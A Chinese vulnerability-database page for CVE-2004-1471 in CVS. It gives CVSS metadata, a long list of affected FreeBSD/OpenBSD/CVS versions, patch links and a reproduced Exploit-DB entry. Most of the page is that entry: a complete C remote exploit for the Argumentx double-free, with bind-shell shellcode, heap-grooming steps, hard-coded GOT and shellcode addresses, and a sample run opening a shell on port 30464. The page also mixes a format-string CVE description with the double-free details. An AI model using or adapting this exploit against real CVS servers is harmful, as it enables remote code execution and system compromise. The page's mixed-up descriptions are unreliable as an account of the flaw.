CVE-2004-1471
CVSS7.1
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:41:29
NMCOE    

[原文]Format string vulnerability in wrapper.c in CVS 1.12.x through 1.12.8, and 1.11.x through 1.11.16 allows remote attackers with CVSROOT commit access to cause a denial of service (application crash) and possibly execute arbitrary code via format string specifiers in a wrapper line.


[CNNVD]CVS Argumentx命令error_prog_name两次释放任意指令执行漏洞(CNNVD-200412-265)

        
        Concurrent Versions System (CVS)是一款开放源代码的版本控制软件。
        CVS "Argumentx"命令存在两次释放问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        "Argumentx" 命令允许为先前提供的参数增加更多数据,这可以通过对最后一个存储参数进行重分配来操作,但是"Argumentx"没有检查在参数列表中是否有任何参数,因为当客户端断开连接的时候程序会释放这个列表,如果列表是空的,realloc()调用就会去试图释放一个不应该被这样操作的指针。此"double-free()"漏洞在多个Linux系统上成功利用。
        

- CVSS (基础分值)

CVSS分值: 7.1 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: SINGLE_INSTANCE [--]

- CPE (受影响的平台与产品)

cpe:/o:freebsd:freebsd:5.1FreeBSD 5.1
cpe:/a:cvs:cvs:1.11.11
cpe:/o:freebsd:freebsd:2.1.6FreeBSD 2.1.6
cpe:/o:freebsd:freebsd:4.3:releng
cpe:/o:freebsd:freebsd:4.6.2FreeBSD 4.6.2
cpe:/o:freebsd:freebsd:5.0FreeBSD 5.0
cpe:/a:cvs:cvs:1.11.2
cpe:/o:freebsd:freebsd:3.5:stable
cpe:/o:freebsd:freebsd:2.2.4FreeBSD 2.2.4
cpe:/o:freebsd:freebsd:4.6:stable
cpe:/a:cvs:cvs:1.12.1
cpe:/o:freebsd:freebsd:2.1.0FreeBSD 2.1.0
cpe:/o:freebsd:freebsd:4.7:releng
cpe:/o:freebsd:freebsd:4.3:release_p38
cpe:/o:freebsd:freebsd:4.1.1:stable
cpe:/o:freebsd:freebsd:2.2FreeBSD 2.2
cpe:/o:freebsd:freebsd:3.0:releng
cpe:/o:openbsd:openbsd:3.4OpenBSD 3.4
cpe:/a:openpkg:openpkg:1.3OpenPKG 1.3
cpe:/o:freebsd:freebsd:3.0FreeBSD 3.0
cpe:/a:cvs:cvs:1.11.10
cpe:/o:freebsd:freebsd:2.2.3FreeBSD 2.2.3
cpe:/o:freebsd:freebsd:5.2FreeBSD 5.2
cpe:/a:cvs:cvs:1.11.4
cpe:/o:freebsd:freebsd:4.5:stable
cpe:/o:freebsd:freebsd:4.6:release
cpe:/o:freebsd:freebsd:2.1.6.1FreeBSD 2.1.6.1
cpe:/o:freebsd:freebsd:4.5FreeBSD 4.5
cpe:/o:freebsd:freebsd:4.9FreeBSD 4.9
cpe:/o:freebsd:freebsd:4.0:releng
cpe:/o:freebsd:freebsd:4.7:release
cpe:/a:cvs:cvs:1.11.1
cpe:/o:freebsd:freebsd:4.3:stable
cpe:/o:freebsd:freebsd:4.5:release_p32
cpe:/o:freebsd:freebsd:4.2:stable
cpe:/o:freebsd:freebsd:4.3:release
cpe:/a:cvs:cvs:1.11.1_p1
cpe:/o:freebsd:freebsd:5.0:release_p14
cpe:/o:freebsd:freebsd:4.6FreeBSD 4.6
cpe:/a:cvs:cvs:1.12.2
cpe:/o:freebsd:freebsd:3.4FreeBSD 3.4
cpe:/o:freebsd:freebsd:5.1:releng
cpe:/a:cvs:cvs:1.11.3
cpe:/o:freebsd:freebsd:2.2.8FreeBSD 2.2.8
cpe:/a:cvs:cvs:1.12.8
cpe:/o:freebsd:freebsd:3.1FreeBSD 3.1
cpe:/o:freebsd:freebsd:4.7:stable
cpe:/a:cvs:cvs:1.11.14
cpe:/o:freebsd:freebsd:4.9:releng
cpe:/o:freebsd:freebsd:4.5:release
cpe:/o:freebsd:freebsd:4.8FreeBSD 4.8
cpe:/o:freebsd:freebsd:4.8:pre-release
cpe:/o:freebsd:freebsd:4.10FreeBSD 4.10
cpe:/a:cvs:cvs:1.11.16
cpe:/a:cvs:cvs:1.11.6
cpe:/a:cvs:cvs:1.10.8
cpe:/o:freebsd:freebsd:4.3FreeBSD 4.3
cpe:/o:freebsd:freebsd:4.8:releng
cpe:/o:freebsd:freebsd:3.5.1:release
cpe:/o:freebsd:freebsd:4.8:release_p6
cpe:/o:openbsd:openbsd:3.5OpenBSD 3.5
cpe:/a:cvs:cvs:1.11.5
cpe:/o:freebsd:freebsd:2.2.5FreeBSD 2.2.5
cpe:/o:freebsd:freebsd:5.2.1:release
cpe:/o:freebsd:freebsd:3.5.1FreeBSD 3.5.1
cpe:/a:sgi:propack:3.0SGI ProPack 3.0
cpe:/a:cvs:cvs:1.11
cpe:/o:freebsd:freebsd:4.9:pre-release
cpe:/o:freebsd:freebsd:3.5.1:stable
cpe:/o:freebsd:freebsd:4.7:release_p17
cpe:/o:freebsd:freebsd:3.2FreeBSD 3.2
cpe:/o:freebsd:freebsd:2.0.5FreeBSD 2.0.5
cpe:/o:freebsd:freebsd:4.7FreeBSD 4.7
cpe:/o:freebsd:freebsd:3.5FreeBSD 3.5
cpe:/o:freebsd:freebsd:5.1:release
cpe:/o:freebsd:freebsd:4.4:release_p42
cpe:/o:freebsd:freebsd:4.10:release
cpe:/o:freebsd:freebsd:4.1.1:release
cpe:/o:freebsd:freebsd:4.2FreeBSD 4.2
cpe:/o:freebsd:freebsd:2.2.6FreeBSD 2.2.6
cpe:/o:freebsd:freebsd:4.4:stable
cpe:/o:freebsd:freebsd:5.1:alpha
cpe:/a:cvs:cvs:1.11.15
cpe:/o:freebsd:freebsd:4.6:releng
cpe:/o:openbsd:openbsd:current
cpe:/o:freebsd:freebsd:2.0FreeBSD 2.0
cpe:/a:cvs:cvs:1.12.5
cpe:/a:openpkg:openpkg:current
cpe:/o:freebsd:freebsd:2.2.2FreeBSD 2.2.2
cpe:/o:freebsd:freebsd:1.1.5.1FreeBSD 1.1.5.1
cpe:/o:freebsd:freebsd:4.0FreeBSD 4.0
cpe:/o:freebsd:freebsd:4.10:releng
cpe:/o:freebsd:freebsd:2.1.7.1FreeBSD 2.1.7.1
cpe:/o:freebsd:freebsd:5.1:release_p5
cpe:/a:openpkg:openpkg:2.0OpenPKG 2.0
cpe:/a:sgi:propack:2.4SGI ProPack 2.4
cpe:/o:freebsd:freebsd:4.6:release_p20
cpe:/a:cvs:cvs:1.12.7
cpe:/o:freebsd:freebsd:5.0:releng
cpe:/o:freebsd:freebsd:4.4:releng
cpe:/o:freebsd:freebsd:5.0:alpha
cpe:/o:freebsd:freebsd:4.4FreeBSD 4.4
cpe:/o:freebsd:freebsd:4.5:releng
cpe:/o:freebsd:freebsd:4.1FreeBSD 4.1
cpe:/o:freebsd:freebsd:2.1.5FreeBSD 2.1.5
cpe:/o:freebsd:freebsd:4.1.1FreeBSD 4.1.1
cpe:/a:cvs:cvs:1.10.7
cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4
cpe:/o:freebsd:freebsd:5.2.1:releng
cpe:/o:freebsd:freebsd:3.3FreeBSD 3.3
cpe:/o:freebsd:freebsd:4.0:alpha

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1471
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1471
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-265
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/10499
(PATCH)  BID  10499
http://xforce.iss.net/xforce/xfdb/16365
(UNKNOWN)  XF  cvs-wrapper-format-string(16365)
http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/022441.html
(VENDOR_ADVISORY)  FULLDISC  20040609 Advisory 09/2004: More CVS remote vulnerabilities
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-04:14.cvs.asc
(VENDOR_ADVISORY)  FREEBSD  FreeBSD-SA-04:14

- 漏洞信息

CVS Argumentx命令error_prog_name两次释放任意指令执行漏洞
高危 未知
2004-12-31 00:00:00 2007-05-14 00:00:00
远程  
        
        Concurrent Versions System (CVS)是一款开放源代码的版本控制软件。
        CVS "Argumentx"命令存在两次释放问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        "Argumentx" 命令允许为先前提供的参数增加更多数据,这可以通过对最后一个存储参数进行重分配来操作,但是"Argumentx"没有检查在参数列表中是否有任何参数,因为当客户端断开连接的时候程序会释放这个列表,如果列表是空的,realloc()调用就会去试图释放一个不应该被这样操作的指针。此"double-free()"漏洞在多个Linux系统上成功利用。
        

- 公告与补丁

        厂商补丁:
        CVS
        ---
        目前厂商已经在1.11.17及1.12.9版的软件中修复了这个安全问题,请到厂商的主页下载:
        https://ccvs.cvshome.org/files/documents/19/194/cvs-1.11.17.tar.gz
        https://ccvs.cvshome.org/files/documents/19/201/cvs-1.12.9.tar.gz
        或者绿盟科技建议您运行通过SSH chrooted的CVS server来代替:pserver:模式:
        
        http://www.netsys.com/library/papers/chrooted-ssh-cvs-server.txt

- 漏洞信息 (24182)

CVS 1.11.x Multiple Vulnerabilities (EDBID:24182)
linux local
2004-06-09 Verified
0 Gyan Chawdhary
N/A [点击下载]
source: http://www.securityfocus.com/bid/10499/info

CVS is prone to multiple vulnerabilities. The issues include a double free vulnerability, format string vulnerabilities, and integer overflows. There is also a null termination issue in the security patch for BID 10384, potentially leading to a server crash. Some of these issues may be leveraged to execute arbitrary code, while other issues may only result in a denial of service.

/* Remote CVS <= 1.11.15 exploit for the error_prog_name double free vuln.
*
* by Gyan Chawdhary, gunnu45 hotmail com
*
* Vulnerability Description:
*
* The Vulnerability lies in the serve_argumentx function. The Argumentx 
command
* parameter is used to append data to a previously supplied Argument 
command.
* These data pointers are stored in the argument_vector array. The
* serve_argumentx fails to check wether an Argument command is present in 
the
* argument_vector and may append data to a pointer that should not get
* touched at all, in our case the *error_prog_name string. The function 
calls
* realloc to create space for the new string. Because realloc will be called
* to store strlen(error_prog_name) + strlen(somedata) the original chunk 
which
* just stores error_prog_name will get freed. This free chunk will once 
again
* get freed after we disconnect from the CVS pserver.
*
* Theory:
*
* Sucessful exploitation depends heavily on a specific heap layout to be 
met.
* The argument_vector is initialized for holding 3 ptrs. If more space is
* required it will call realloc. The error_prog_name string resides right
* after the argument_vector chunk.
*
* |11| arg_vector |11| error_prog_name |109| some chunk
*
* address of error_prog_name is stored in the argument_vector[0].
*
* To achive sucessfull exploitation the following steps are performed.
*
* 1) Send Argumentx command with a large argument to reallocate 
error_prog_name
* + large command on top of the heap. This will free the original
* error_prog_name buffer.
*
* 2) Send 50 Argument calls which will require the argument_vector array to 
be
* reallocated freeing the current buffer. We keep this a high number to get
* mem from the top itself and to make the exploit reliable. As both the
* original the arg_vector & err_prg_name buffers are free they are
* consolidated. Also we supply our fake chunk and shellcode in this call.
*
* 3) Send an argument command with the size & prevsize as its arguments. 
This
* will now be stored in arg_vector & err_prg_name consolidated buffer.
*
* 4) Once we close the connection free will be called on the error_prog_name
* string which will read our fake size & prev_size fields pointing to the 
fake
* chunk , executing our shellcode.
*
* Phew !!!!
*
* NOTES: Iv tried this exp on RH 8 with glibc 2.3.*. This exp did NOT work 
on
* my slack 8.0 cause of glibc 2.2 which creates a very different heap 
layout.
* Also some tweaking will be required to use this exploit remotely as 
sometimes
* the overwritten GOT does not execute due to early drop in the connection 
..
* Please someone figure it out n mail me :) ..
*
* Now the exploit
*
* FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL
* PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR
* EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL 
PURPOSE *
* Greets: jp - for his cool paper on advanced malloc exploits, and the 
heapy.so
* jaguar@felinemenace - We at ... :P
*
* cya
*
* Gyan
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>

char shellcode[] =
"\xeb\x18"
"AAAAAAAAAAAAAAAAAAAAAAAA"
"\x31\xc0" // xorl %eax,%eax
"\x31\xdb" // xorl %ebx,%ebx
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xd2" // xorl %edx,%edx
"\xb0\x66" // movb $0x66,%al
"\xb3\x01" // movb $0x1,%bl
"\x51" // pushl %ecx
"\xb1\x06" // movb $0x6,%cl
"\x51" // pushl %ecx
"\xb1\x01" // movb $0x1,%cl
"\x51" // pushl %ecx
"\xb1\x02" // movb $0x2,%cl
"\x51" // pushl %ecx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xcd\x80" // int $0x80

/* port is 30464 !!! */
/* bind(fd, (struct sockaddr)&sin, sizeof(sin) ) */
"\xb3\x02" // movb $0x2,%bl
"\xb1\x02" // movb $0x2,%cl
"\x31\xc9" // xorl %ecx,%ecx
"\x51" // pushl %ecx
"\x51" // pushl %ecx
"\x51" // pushl %ecx
/* port = 0x77, change if needed */
"\x80\xc1\x77" // addb $0x77,%cl
"\x66\x51" // pushl %cx
"\xb1\x02" // movb $0x2,%cl
"\x66\x51" // pushw %cx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xb2\x10" // movb $0x10,%dl
"\x52" // pushl %edx
"\x51" // pushl %ecx
"\x50" // pushl %eax
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x89\xc2" // movl %eax,%edx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80

/* listen(fd, 1) */
"\xb3\x01" // movb $0x1,%bl
"\x53" // pushl %ebx
"\x52" // pushl %edx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x66" // movb $0x66,%al
"\x80\xc3\x03" // addb $0x3,%bl
"\xcd\x80" // int $0x80

/* cli = accept(fd, 0, 0) */
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x50" // pushl %eax
"\x52" // pushl %edx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xb3\x05" // movl $0x5,%bl
"\xb0\x66" // movl $0x66,%al
"\xcd\x80" // int $0x80

/* dup2(cli, 0) */
"\x89\xc3" // movl %eax,%ebx
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80

/* dup2(cli, 1) */
"\x41" // inc %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movl $0x3f,%al
"\xcd\x80" // int $0x80

/* dup2(cli, 2) */
"\x41" // inc %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80

/* execve("//bin/sh", ["//bin/sh", NULL], NULL); */
"\x31\xdb" // xorl %ebx,%ebx
"\x53" // pushl %ebx
"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
"\x89\xe3" // movl %esp,%ebx
"\x8d\x54\x24\x08" // leal 0x8(%esp),%edx
"\x31\xc9" // xorl %ecx,%ecx
"\x51" // pushl %ecx
"\x53" // pushl %ebx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x0b" // movb $0xb,%al
"\xcd\x80" // int $0x80

/* exit(%ebx) */
"\x31\xc0" // xorl %eax,%eax
"\xb0\x01" // movb $0x1,%al
"\xcd\x80"; // int $0x80

void login(char *, char *, char *);

struct          sockaddr_in s;
int             sock;

void xp_connect(char *ip)
{
        char buffer[1024];
        char temp[1024];
        int tmp;

        s.sin_family = AF_INET;
        s.sin_port = htons(2401);
        s.sin_addr.s_addr = inet_addr(ip);

        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        {
                printf("Cannot create socket\n");
                exit(-1);
        }

        if((connect(sock,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 
0)
        {
                printf("Cannot connect()\n");
                exit(-1);
        }
}

void xp_write(char *data)
{

	if(write (sock, data, strlen(data)) < 0)
	{
	 printf("write() failed\n");
	 exit(-1);
	}
}

void xp_receive()
{
	int tmp;
	char buffer[1024*2];

	if ( (tmp = read(sock, buffer, sizeof(buffer))) <= 0)
	{
		printf("read() failed\n");
		exit(-1);
	}
	printf("%s", buffer);
}




#define GOT_MEMCPY 0x80d2b4a
#define SHELL_ADDR 0x080cda20

char *egg(unsigned int what, unsigned int where)
{
        char *ptr, *buf;
        int i=0; //dummy = 0xfffffffc;
        int size = strlen(shellcode);

        // Will contain our fake chunk supplided with our fd & bk fields,
        // addr of shellcode & got addr - 8 of free(). We will also try to
        // stuff in our shellcode in the same buffer as I dont have enough
        // gdb patience/time  to find nother controlable buffer :P
        buf = (char *)malloc(1250);
        ptr = buf;

        for (;i<1248;) {

        *( (int **)ptr ) = (int *)( where - 8 );
        ptr+=4;
        *( (int **)ptr ) = (int *)( what );
        ptr+=4;

        i+=8;
        }
        buf[1250] = '\0';
        ptr -= size;
	strcpy(ptr, shellcode);
        ptr = buf;
        return ptr;

}

unsigned char shifts[] = {
      0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14, 15,
      16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
      114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87,
      111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105,
      41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35,
      125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56,
      36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48,
      58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223,
      225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190,
      199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193,
      174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212,
      207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246,
      192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176,
      227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127,
      182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195,
      243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 };

char   *scramble(char * str)
{
    int                 i;
    char                * s;

    s = (char *) malloc (strlen (str) + 3);
    memset(s, '\0', strlen(str) + 3);
    *s = 'A';
    for (i = 1; str[i - 1]; i++)
    s[i] = shifts[(unsigned char)(str[i - 1])];
    return (s);
}

#define LOGIN "BEGIN AUTH REQUEST\n/home/cvsroot\n%s\n%s\nEND AUTH 
REQUEST\n"
#define REQUEST "Root %s\n"

void login(char *login, char *password, char *repo)
{
	char *buf, *ptr, reply[1024];
	char *rep, *rp;
	buf = (char *)malloc(1024);
	rep = (char *)malloc(512);

	ptr = buf;
	rp = rep;
	sprintf(ptr, LOGIN, login, scramble(password));
	sprintf(rp, REQUEST, repo);

	ptr = buf;

	xp_write(ptr); /* login request */
	xp_receive();
	xp_write(rp); /* root dir request */


}

char argumentx[] = "Argumentx %s\n";
char argument[] =  "Argument %s\n";
char trash[] = "FCUK";
char str[] = "Argument \x42\x42\x42\x42\x6e\xff\xff\xff\x1c\xfc\xff\xff"
	     "\xf0\xff\xff\xff\x41\x41\n";

void overflow()
{
   	char *data, *dptr, *buf, *bufp, *eg, *arg, *aptr;
	int i;
	data = (char *)malloc(111111);
	dptr = data;
	buf = (char *)malloc(111111+20);
	bufp = buf;
	arg = (char *)malloc(1500);
	aptr = arg;


	memset(dptr, '\x41', 111111);
	sprintf(bufp, argumentx, data);
	xp_write(bufp);

	eg = egg(0x80d2b4a, 0x080cda20);
	sprintf(aptr, argument, eg);

	for (i=0 ; i<50; i++)
	xp_write(aptr);

	xp_write(str);
	xp_write(trash);
}



void usage(char *name)
{
	printf("CVS <= 1.11.15 Argumentx double free() remote exploit by Gyan"
	       "Chawdhary (gunnu45@hotmail.com)\n"
       	       "Usage: %s <options>\n"
	       "-i <target IP address>\n"
	       "-l <login>\n"
	       "-p <password>\n"
	       "-r <repository path>\n\n", name);
}



main(int argc, char **argv)
{
	int c;
	char ip[16], user[32], pass[32], rep[512];

	ip[0] = 0;
	user[0] = 0;
	pass[0] = 0;
	rep[0] = 0;

	if (argc < 2) {
		usage(argv[0]);
		exit(0);
	}

	while ((c = getopt(argc, argv, "h::l:p:i:r:")) != -1) {

		switch(c) {

			case 'h':
				usage(argv[0]);
				exit(0);
			case 'i':
				strncpy(ip, optarg, sizeof(ip));
				break;
			case 'l':
				strncpy(user, optarg, sizeof(user));
				break;
			case 'p':
				strncpy(pass, optarg, sizeof(pass));
				break;
			case 'r':
				strncpy(rep, optarg, sizeof(rep));
				break;
		}
	}

	if(ip) {
		printf("Connecting to vulnerable CVS server ...");
		xp_connect(ip);
		printf("OK\n");
	}

        printf("Logging in ...");
        login(user, pass, rep);
	printf("OK\n");

      printf("Exploiting the CVS error_prog_name double free now ...");
      overflow();
      printf("DONE\n");
      printf("If everything went well there should be a shell on port 
30464\n");
}





//	xp_connect("127.0.0.1");
//	sleep(20);
//	login("gyan", "gyan");
//	overflow(shellcode);

/*

[root@ill crazy]# ./free -i 127.0.0.1 -l gyan -p gyan -r /home/cvsroot
Connecting to vulnerable CVS server ...OK
Logging in ...I LOVE YOU
OK
Exploiting the CVS error_prog_name double free now ...DONE
If everything went well there should be a shell on port 30464
[root@ill crazy]# telnet 127.0.0.1 30464
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.

*/		

- 漏洞信息

15727
CVS Wrapper Line Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-06-09 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站